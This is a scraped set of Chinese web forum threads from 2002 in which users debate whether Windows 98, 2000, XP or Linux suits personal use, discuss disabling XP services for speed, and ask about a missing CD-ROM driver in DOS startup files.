我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！

Blueidea Counter Strike Team
=Blueidea=onlysnake

fellow

Fellow
积分：3698
发帖：1067
来自：sd.gd.cn
注册：2001-02-20
 发表于 2002-02-14 22:27:56 按此观看fellow的个人资料 按此发邮件给fellow fellow 的 oicq 是5144255,查看 5144255 的资料 发送悄悄话给fellow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看fellow的IP
当然有变化了，每一次我都把不用的组件停了的。
光是iis停下来就少了十几m了（内存使用）。

Xp The Future 3
还是那句：学师三日，天下无敌；学师三年，寸步难行。
ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
 发表于 2002-02-15 00:28:35 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
IIS并不是XP默认安装的啊
停止这些服务2000的效果要比XP明显，因为XP已经很快了

::古落根门::

唯有不断学习 才能不断进步

fellow

Fellow
积分：3698
发帖：1067
来自：sd.gd.cn
注册：2001-02-20
 发表于 2002-02-15 00:54:01 按此观看fellow的个人资料 按此发邮件给fellow fellow 的 oicq 是5144255,查看 5144255 的资料 发送悄悄话给fellow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看fellow的IP
我以前玩过xp的服务，的确没有什么好停的了，都是一些小东西。
想加快xp的速度，最根本还是不要要那些花哨的东西，但是这样跟2000又有什么无别呢？

Xp The Future 3
还是那句：学师三日，天下无敌；学师三年，寸步难行。
ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
 发表于 2002-02-15 01:00:23 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
所以说啊，2000好啊，再说还有server版本的

::古落根门::

唯有不断学习 才能不断进步

onlysnake

终级用户
积分：2127
发帖：739
来自：经典_流氓屯
注册：2002-01-10
 发表于 2002-02-15 18:02:06 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP
靠！不是吧…………

很多人都说２０００好，但是我还是认为ＸＰ好！呵呵……………………

我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！

Blueidea Counter Strike Team
=Blueidea=onlysnake

上一贴 | 下一贴
快速回复 主题：禁用服务组件，给你的Windows XP加速
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


98，2000，XP，LINUX，装什么系统比较好？个人用 - 经 典 论 坛

dreamweaver MX 功能探索

计算机技术
98，2000，XP，LINUX，装什么系统比较好？个人用 (页 1)

这个主题共有2页：1 2 上一贴 | 下一贴
发表人 主题: 98，2000，XP，LINUX，装什么系统比较好？个人用
onlysnake

终级用户
积分：2127
发帖：739
来自：经典_流氓屯
注册：2002-01-10
 发表于 2002-02-12 18:26:55 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 收藏该主题供以后查看 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP
98，2000，XP，LINUX，装什么系统比较好？个人用的

还有其他的系统吗？

有用过其他的系统的朋友，进来聊一下！呵呵…………

我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！

Blueidea Counter Strike Team
=Blueidea=onlysnake

akane

超级用户
积分：368
发帖：330
来自：乱马1/2的世界
注册：2000-07-14
 发表于 2002-02-12 19:20:37 按此观看akane的个人资料 该用户不允许显示它的电子邮件 akane 的 oicq 是58346,查看 58346 的资料 发送悄悄话给akane 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看akane的IP
喜欢2000

讨厌 xp

但是最近必须要安 linux 和 xp了 怎么才能多操作系统引导呢?

而且我要从硬盘安装linux怎么安呢

[这消息被akane编辑过(编辑时间2002-02-12 19:23:21)]

程序&漫画
Fly

Developer
积分：4146
发帖：1028
来自：
注册：2001-10-31
 发表于 2002-02-12 19:21:00 按此观看Fly的个人资料 按此发邮件给Fly Fly 的 oicq 是7969660,查看 7969660 的资料 发送悄悄话给Fly 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Fly的IP
个人用,如果机器可以,装XP+98吧,如果想搞搞开发,就再加上WIN2K SERVER吧
个人意见

我的虚荣心是用十句话说出别人用一本书讲出的东西和别人用一本书没有讲出的东西.
----尼采

Fly

Developer
积分：4146
发帖：1028
来自：
注册：2001-10-31
 发表于 2002-02-12 19:22:15 按此观看Fly的个人资料 按此发邮件给Fly Fly 的 oicq 是7969660,查看 7969660 的资料 发送悄悄话给Fly 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Fly的IP
TO akane:
如果实在不认,试试第三方软件呢

我的虚荣心是用十句话说出别人用一本书讲出的东西和别人用一本书没有讲出的东西.
----尼采

啸

无意
现任版主
积分：6225
发帖：2154
来自：
注册：2000-08-01
 发表于 2002-02-12 19:29:09 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
都装，个人认为

XP：平常使用
98：应急用
2000：装IIS,sql sever 调试网络
Linux：学习用

宠辱不惊，坐看庭前花开花落；去留无意，任天上云卷云舒......

Blueidea Web Team.
Moderator Of Computer Technology Forum

imacwei

终级用户
积分：2344
发帖：1077
来自：China.Jiangs
注册：2001-07-23
 发表于 2002-02-12 19:44:26 按此观看imacwei的个人资料 按此发邮件给imacwei 访问imacwei的主页 imacwei 的 oicq 是36110975,查看 36110975 的资料 发送悄悄话给imacwei 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看imacwei的IP
装个2000就够了，呵呵！

Loading…………
WINDOWS2000-SP2+IE5.5
FIREWORKS,the solution for professional Web graphic design and production.
Press Anykey To Continue…

iMacWei
风梦扬

超级用户
积分：331
发帖：125
来自：广州
注册：2000-10-21
 发表于 2002-02-12 20:00:48 按此观看风梦扬的个人资料 按此发邮件给风梦扬 访问风梦扬的主页 风梦扬 的 oicq 是110681,查看 110681 的资料 发送悄悄话给风梦扬 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看风梦扬的IP
http://www.blueidea.com/bbs/NewsDetail.asp?id=377259

现在基本所有 linux 都可以从硬盘安装的.

我现在在等待 xp 服务器版本,目前 xp 专业版虽然已经满足我大多需要,但有些东西我还是得借助第3方的软件或者程序.

FreeBSD 也很不错的,但现在一来安装特别复杂和麻烦;二来直到现在为止还有个缺点缺陷没搞好,所以我玩了一段时间就已经没用了,期待下个版本.

Solries 还没开始接触.

华语互联直播立体台 -- Yuner.com(.cn) 全球华人目标生活多维媒质.

想和NJ们互动么?也欢迎各位一起来参与我们的节目!

进入 "QQ聊天室 -- 网络社团 -- 华语互联网络直播" 一起来互联你我吧.

浸食·花葬

极度色郎
积分：7812
发帖：2959
来自：|翅膀|
注册：2001-07-09
 发表于 2002-02-12 20:11:20 按此观看浸食·花葬的个人资料 按此发邮件给浸食·花葬 访问浸食·花葬的主页 浸食·花葬 的 oicq 是7368317,查看 7368317 的资料 发送悄悄话给浸食·花葬 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看浸食·花葬的IP
谁跟我说说xp比2k好在哪里 （界面就不要说了-我讨厌xp的样子，不伦不类的；说说系统方面）

幕末 ——
京都に人斬り拔刀齋と呼ばれた志士がぃた.
修羅さながらに人を斬り.その血刀を以って新
時代『明治』を切り拓ぃたその男は.動亂の
終結と共に人々の前から姿を消した ——
风梦扬

超级用户
积分：331
发帖：125
来自：广州
注册：2000-10-21
 发表于 2002-02-12 20:18:20 按此观看风梦扬的个人资料 按此发邮件给风梦扬 访问风梦扬的主页 风梦扬 的 oicq 是110681,查看 110681 的资料 发送悄悄话给风梦扬 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看风梦扬的IP
呵呵,针对的用户群不同吧.或者说,一个系统没设置而是默认状态的话.....的确都不满意.

不如各位先说说觉得 2000 比 xp 好在哪里,我再一个个说明好了.

p.s 我首先得声明我不是盲目维护 xp ,或者说 2000 不好;:]

华语互联直播立体台 -- Yuner.com(.cn) 全球华人目标生活多维媒质.

想和NJ们互动么?也欢迎各位一起来参与我们的节目!

进入 "QQ聊天室 -- 网络社团 -- 华语互联网络直播" 一起来互联你我吧.

浸食·花葬

极度色郎
积分：7812
发帖：2959
来自：|翅膀|
注册：2001-07-09
 发表于 2002-02-12 20:22:00 按此观看浸食·花葬的个人资料 按此发邮件给浸食·花葬 访问浸食·花葬的主页 浸食·花葬 的 oicq 是7368317,查看 7368317 的资料 发送悄悄话给浸食·花葬 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看浸食·花葬的IP

2k我是习惯了 也顺手 繁体的英文的都好用 ~

去年公司有一项目是xp的教程（flash的 不过我没参与）

觉得 （抛开界面 .... ）

不知道它不2k强在哪里 还跟me一样有一系统还原

任务栏还会假死

~~ 所以 更不知道它哪里好了

幕末 ——
京都に人斬り拔刀齋と呼ばれた志士がぃた.
修羅さながらに人を斬り.その血刀を以って新
時代『明治』を切り拓ぃたその男は.動亂の
終結と共に人々の前から姿を消した ——
ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
 发表于 2002-02-12 20:29:22 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
风梦扬在上个帖子中说
引用:
http://www.blueidea.com/bbs/NewsDetail.asp?id=377259

现在基本所有 linux 都可以从硬盘安装的.

我现在在等待 xp 服务器版本,目前 xp 专业版虽然已经满足我大多需要,但有些东西我还是得借助第3方的软件或者程序.

XP服务器版就是.net了吧，SERVER的2000没得说啊

::古落根门::

唯有不断学习 才能不断进步

onlysnake

终级用户
积分：2127
发帖：739
来自：经典_流氓屯
注册：2002-01-10
 发表于 2002-02-13 10:13:56 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP
哇！…………
这么多意见！我到底要听谁的呀！

有人建议我每个系统都装，这到是个好方法，但是……………………

我的硬盘宝宝只有10…………………………哎………………………………

另外，我觉得XP比2000好用（说2000好用的朋友别拿砖头砍我呀！）。
至于ME嘛…………垃圾！肯定是垃圾！！！

我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！

Blueidea Counter Strike Team
=Blueidea=onlysnake

onlysnake

终级用户
积分：2127
发帖：739
来自：经典_流氓屯
注册：2002-01-10
 发表于 2002-02-13 10:15:56 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP
忘了说了，XP有SEVER版的吗？

什么时候出？

我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！

Blueidea Counter Strike Team
=Blueidea=onlysnake

tsin

初级用户
积分：15
发帖：7
来自：山东淄博
注册：2002-01-13
 发表于 2002-02-13 10:29:36 按此观看tsin的个人资料 按此发邮件给tsin 访问tsin的主页 tsin 的 oicq 是2120757,查看 2120757 的资料 发送悄悄话给tsin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看tsin的IP
个人用
首先推荐2000
配置高用xp

http://ifcold.6to23.com
九鬼刀马

初级用户
积分：143
发帖：85
来自：江苏
注册：2001-04-20
 发表于 2002-02-13 12:32:01 按此观看九鬼刀马的个人资料 按此发邮件给九鬼刀马 访问九鬼刀马的主页 发送悄悄话给九鬼刀马 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看九鬼刀马的IP
个人用的话，上网，娱乐，游戏，我建议使用Win98，
如果你还要学习，需要安装服务软件，如IIS，或者安装Php、MySQL的话，Win2000下面会简单很多，使Win2000支持Php、MySQL、CGI只要加一个筛选器就可以了，过程不到5分钟
XP？我没有用过，界面我看了，有一种不结实的感觉，而且我不喜欢太花的东西（个人看法），启动系统和启动软件的时候好像比2000快一些。
如果技术较高，推荐使用Win2000
advance server版本，安装以后打开“服务”，把里面自动启动，而你却用不到的进程改为手动启动，这样优化一下，速度比Win2000 pro还要快。而且使用Win2000 advance server对于学习服务器也有好处。
Linux也不错，学习一下也挺好的，我正在学习！
推荐安装win98+win2000+linux，安装的顺序也是98 2000 linux，记住，linux一定要在字符方式下面安装，这样启动以后会进入字符界面，然后再学习linxu，在那个Xwindows界面里面，什么都学不到，真的！
然后启动进入Win2000，安装一个System command7.02（反正选择最新的版本），可以用这个工具来引导系统的启动了！
倒～写了这么对了啊～呵呵，以上是我怎样做的，希望给大家做一个参考
chikin

初级用户
积分：71
发帖：19
来自：GuangZhou
注册：2001-12-27
 发表于 2002-02-13 15:42:21 按此观看chikin的个人资料 按此发邮件给chikin 访问chikin的主页 chikin 的 oicq 是3636091,查看 3636091 的资料 发送悄悄话给chikin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看chikin的IP
其实我挺同意 啸 的意见的。
说到平时用嘛，还是用一个比较舒服好看的系统好一点，98应该大家都看厌了，但不少一些专业软件都不一定能FOR 2K OR XP。这时还是要靠98。
但我发现我的XP有一个问题，我的机有一台刻录机和一个CDROM，在XP下有时会出现CDROM读不了碟的现象，而且这现象已经不是只有我存在，另外的人也有同样遭遇，不知大家有没有碰过这样的问题呢？

JavaScript Stack ----> 『网页天使』
dancing

叶恨花
现任版主
积分：4737
发帖：2230
来自：|二进制情感天空|
注册：2000-12-11
 发表于 2002-02-13 16:06:31 按此观看dancing的个人资料 按此发邮件给dancing 发送悄悄话给dancing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看dancing的IP
我的XP用到现在一切正常，没有出现什么麻烦，可能还不到时候？但感觉其实挺不错的，就是不如2000用着踏实，毕竟2000用了那么长时间了。

情归秋雪缠绵叶，恨是西风寂寞花。最痛处，别后离愁… …

Blueidea Web Team
Moderator Of Photoshop & Imagerady Forum

onlysnake

终级用户
积分：2127
发帖：739
来自：经典_流氓屯
注册：2002-01-10
 发表于 2002-02-13 21:21:35 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP
我认为XP的唯一的（其实是我唯一发现的）优点就是超级的稳定！！！

我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！

Blueidea Counter Strike Team
=Blueidea=onlysnake

ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
 发表于 2002-02-13 21:39:13 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
很赞同九鬼刀马的意见，2000的AS确实不错
另外onlysnake，XP现在还没有server，XP的server就是微软的下一个战略：.net

::古落根门::

唯有不断学习 才能不断进步

onlysnake

终级用户
积分：2127
发帖：739
来自：经典_流氓屯
注册：2002-01-10
 发表于 2002-02-13 21:44:43 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP
听说那个东东要收费的！
靠…………………………………………

我TMD直接装LINUX，看看谁怕谁？
我才没时间哄着微软玩呢！

我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！

Blueidea Counter Strike Team
=Blueidea=onlysnake

爱老虎油

闪客作家
现任版主
积分：7267
发帖：2946
来自：西安
注册：2001-03-10
 发表于 2002-02-13 22:10:42 按此观看爱老虎油的个人资料 按此发邮件给爱老虎油 爱老虎油 的 oicq 是10507289,查看 10507289 的资料 发送悄悄话给爱老虎油 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看爱老虎油的IP
说了半天，，，大家都忘了问你，，你个人都干什么用

爱所有会闪的油

Blueidea Web Team.
Moderator Of Flash forum

dancing

叶恨花
现任版主
积分：4737
发帖：2230
来自：|二进制情感天空|
注册：2000-12-11
 发表于 2002-02-13 22:13:39 按此观看dancing的个人资料 按此发邮件给dancing 发送悄悄话给dancing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看dancing的IP
ImHow在上个帖子中说
引用:
很赞同九鬼刀马的意见，2000的AS确实不错
另外onlysnake，XP现在还没有server，XP的server就是微软的下一个战略：.net

不知道MS给Intel专门作的XpServer有谁见过，听说这是不公开发售的。

情归秋雪缠绵叶，恨是西风寂寞花。最痛处，别后离愁… …

Blueidea Web Team
Moderator Of Photoshop & Imagerady Forum

onlysnake

终级用户
积分：2127
发帖：739
来自：经典_流氓屯
注册：2002-01-10
 发表于 2002-02-14 10:17:44 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP
放心吧，中国的“地板”是最牛B的！

不管他出什么，我们总是有“地板”用的！

呵呵………………

我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！

Blueidea Counter Strike Team
=Blueidea=onlysnake

ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
 发表于 2002-02-14 20:42:44 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
dancing在上个帖子中说
引用:
ImHow在上个帖子中说
引用:
很赞同九鬼刀马的意见，2000的AS确实不错
另外onlysnake，XP现在还没有server，XP的server就是微软的下一个战略：.net

不知道MS给Intel专门作的XpServer有谁见过，听说这是不公开发售的。

.net版本网上好像有测试版本下载

::古落根门::

唯有不断学习 才能不断进步

onlysnake

终级用户
积分：2127
发帖：739
来自：经典_流氓屯
注册：2002-01-10
 发表于 2002-02-14 21:07:40 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP
哦？
用下载的吗？多大的个头？
我是说：多少M的？？？
另外，哪可以下载！！！

如果不太大的话，可以考虑试一下！！！

我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！

Blueidea Counter Strike Team
=Blueidea=onlysnake

sky2000

终级用户
积分：2258
发帖：849
来自：WuHan.CN
注册：2001-01-22
 发表于 2002-02-14 23:27:07 按此观看sky2000的个人资料 按此发邮件给sky2000 sky2000 的 oicq 是6256954,查看 6256954 的资料 发送悄悄话给sky2000 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看sky2000的IP
我看过一篇文章，说实在的还是2000要好一点。

I Love This !
Biketrial football basketball music......
..:::sky2000.tk:::..
ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
 发表于 2002-02-15 00:33:20 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
onlysnake在上个帖子中说
引用:
哦？
用下载的吗？多大的个头？
我是说：多少M的？？？
另外，哪可以下载！！！

如果不太大的话，可以考虑试一下！！！

听说而已，我帮你打听打听

::古落根门::

唯有不断学习 才能不断进步

添君E画

危险人物
积分：1347
发帖：582
来自：四川省达洲市
注册：2002-01-11
 发表于 2002-02-15 10:19:52 按此观看添君E画的个人资料 按此发邮件给添君E画 访问添君E画的主页 添君E画 的 oicq 是8341595,查看 8341595 的资料 发送悄悄话给添君E画 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看添君E画的IP
NT SERVER

[注：这是个危险人物！] .: :.
bb

初级用户
积分：85
发帖：36
来自：
注册：2001-06-07
 发表于 2002-02-15 11:08:20 按此观看bb的个人资料 按此发邮件给bb 发送悄悄话给bb 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看bb的IP
onlysnake在上个帖子中说
引用:
哇！…………
这么多意见！我到底要听谁的呀！

有人建议我每个系统都装，这到是个好方法，但是……………………

我的硬盘宝宝只有10…………………………哎………………………………

另外，我觉得XP比2000好用（说2000好用的朋友别拿砖头砍我呀！）。
至于ME嘛…………垃圾！肯定是垃圾！！！

还是用2000+98吧
2000工作
98 玩游戏

至于XP，你如果机得配置可以的话，又不搞什么工作的话
还是可以用用的

onlysnake

终级用户
积分：2127
发帖：739
来自：经典_流氓屯
注册：2002-01-10
 发表于 2002-02-15 17:26:48 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP
为什么用98+2000，而不用98+XP呢？
我觉得XP还可以的！
主要是我觉得XP的网络优化作的不错！
上网相当长时间也不会出现问题！

我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！

Blueidea Counter Strike Team
=Blueidea=onlysnake

这个主题共有2页：1 2 上一贴 | 下一贴
快速回复 主题：98，2000，XP，LINUX，装什么系统比较好？个人用
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


98，2000，XP，LINUX，装什么系统比较好？个人用 - 经 典 论 坛

计算机技术
98，2000，XP，LINUX，装什么系统比较好？个人用 (页 2)

这个主题共有2页：1 2 上一贴 | 下一贴
发表人 主题: 98，2000，XP，LINUX，装什么系统比较好？个人用
ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
 发表于 2002-02-15 23:36:58 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
2000上网相当长时间也没有问题啊
我现在用XP，已经决定重新装成2000Server了。虽然烦，不过我认为还是有必要，毕竟学的就是这个嘛，呵呵~~
就SERVER版本而言，2000很好了，虽然在稳定性方面不如UNIX，不过个人用嘛，OK！

::古落根门::

唯有不断学习 才能不断进步

风梦扬

超级用户
积分：331
发帖：125
来自：广州
注册：2000-10-21
 发表于 2002-02-16 00:38:07 按此观看风梦扬的个人资料 按此发邮件给风梦扬 访问风梦扬的主页 风梦扬 的 oicq 是110681,查看 110681 的资料 发送悄悄话给风梦扬 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看风梦扬的IP
哎,还是不说了,头疼...

按自己个人习惯和所需装自己的系统吧.

华语互联直播立体台 -- Yuner.com(.cn) 全球华人目标生活多维媒质.

想和NJ们互动么?也欢迎各位一起来参与我们的节目!

进入 "QQ聊天室 -- 网络社团 -- 华语互联网络直播" 一起来互联你我吧.

onlysnake

终级用户
积分：2127
发帖：739
来自：经典_流氓屯
注册：2002-01-10
 发表于 2002-02-16 16:27:54 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP
是呀，是呀，
大家还是装自己喜欢的吧！

我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！

Blueidea Counter Strike Team
=Blueidea=onlysnake

bb

初级用户
积分：85
发帖：36
来自：
注册：2001-06-07
 发表于 2002-02-16 19:53:59 按此观看bb的个人资料 按此发邮件给bb 发送悄悄话给bb 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看bb的IP
onlysnake在上个帖子中说
引用:
为什么用98+2000，而不用98+XP呢？
我觉得XP还可以的！
主要是我觉得XP的网络优化作的不错！
上网相当长时间也不会出现问题！

2000有很多功能是XP不能做的，工作用到就知道了
XP我用了感觉就是98系统+2000的稳定性，还是个人玩游戏用的
好点，不会象98那样容易死机，不过硬件吃得很厉害
这个主题共有2页：1 2 上一贴 | 下一贴
快速回复 主题：98，2000，XP，LINUX，装什么系统比较好？个人用
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


如何在CONFIG.SYS和AUTOEXEC.BAT~~ - 经 典 论 坛

计算机技术
如何在CONFIG.SYS和AUTOEXEC.BAT~~

上一贴 | 下一贴
发表人 | 主题: 如何在CONFIG.SYS和AUTOEXEC.BAT~~
叶竟 终级用户 积分：628 发帖：174 来自：中国 注册：2001-11-19 | 发表于 2002-02-18 12:45:28 按此观看叶竟的个人资料 按此发邮件给叶竟 收藏该主题供以后查看 发送悄悄话给叶竟 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看叶竟的IP 如何在CONFIG.SYS和AUTOEXEC.BAT 中编辑 丢失的光驱驱动程序？ 我的光驱丢了？ 谢谢高手指教
robbit 初级用户 积分：31 发帖：11 来自：湖北省荆州市沙市区 注册：2001-07-13 | 发表于 2002-02-18 19:51:31 按此观看robbit的个人资料 按此发邮件给robbit robbit 的 oicq 是4925353,查看 4925353 的资料 发送悄悄话给robbit 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看robbit的IP 做张ｗｉｎ９８启动盘不就行了． I am Robbit Yoyo. ゎたしは さぃなんです。
